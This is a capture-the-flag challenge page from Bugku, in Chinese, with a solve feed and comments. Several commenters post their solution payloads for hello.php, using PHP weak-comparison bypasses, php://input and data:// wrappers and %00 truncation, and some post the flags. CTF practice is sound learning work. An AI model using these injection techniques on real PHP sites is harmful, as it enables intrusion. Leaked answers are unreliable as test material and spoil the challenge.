评分(21)
解题动态
yanzhenfeng 攻破了该题 2小时前
19899132100 攻破了该题 8小时前
用心好吗笨蛋 攻破了该题 1天前
Ktcc5 攻破了该题 4天前
土豆班长 攻破了该题 4天前
1148391538 攻破了该题 4天前
adsas 攻破了该题 5天前
派大星和海绵宝宝 攻破了该题 5天前
agvkuyfrzch 攻破了该题 6天前
z723622533 攻破了该题 7天前
PDXX 攻破了该题 9天前
faasfagasg 攻破了该题 9天前
hh4h 攻破了该题 9天前
17632087155 攻破了该题 9天前
18283162726 攻破了该题 10天前
hackhui 攻破了该题 11天前
脆脆鲨德萨 攻破了该题 13天前
负剑豪猪 攻破了该题 14天前
tolobuick 攻破了该题 14天前
评论
agvkuyfrzch 6天前
举报
flag{bf20f4a3f1c12356796e5b61688e74a
1969901506 1月前
举报
五边形战士
coldplay99999 3月前
举报
flag{bb25f9ec286ae9753bb12e5631da7f1e}
26ww 3月前
举报
66
不会写代码的菜鸟 6月前
举报
难点1.源代码里1.html文件查看跳转bugku导致1.html的源码不容易被捕获,我看了wp用bp抓了n次才抓到。我这种菜鸟根本想不到view resouce。2.抓到源码后的解码要先url解码再base再url才能解出来代码;我擦这一步我不看也做不到。3.这步最难,代码审计,发现id=0,用弱比较,id=0a;a的值来自data直接协议data://text/plain,bugku is a
Jiafeng 1月前
举报
第一步一开始的思路真的很重要。反而感觉后面的代码审计不是难点了;
loulegedadong 7月前
举报
hello.php?id=0sdvdsd&a=php://input&b=.sdfasdfsdafsdfrdfgsdgasdftgssd postdata:bugku is a nice plateform!
不懂就问 10月前
举报
参考学习:https://blog.csdn.net/qq_36292543/article/details/136676985
一路奔腾 1年前
举报
POST /hello.php?id=0a&a=php://input&b=*asdfassdf 内容为:bugku is a nice plateform!
xawm 1年前
举报
?id=0p&b=%00114514&a=data://text/plain,bugku is a nice plateform! //id弱匹配绕过,b使用%00截断符截断语句让111在1114中且开头的字符不是4,a运用伪协议
miaolegecui 1年前
举报
firfox浏览器的post不能只传值,所以用php://post的方式传值点execute没反应,试试用其他方式a=data://text/plain,bugku is a nice plateform!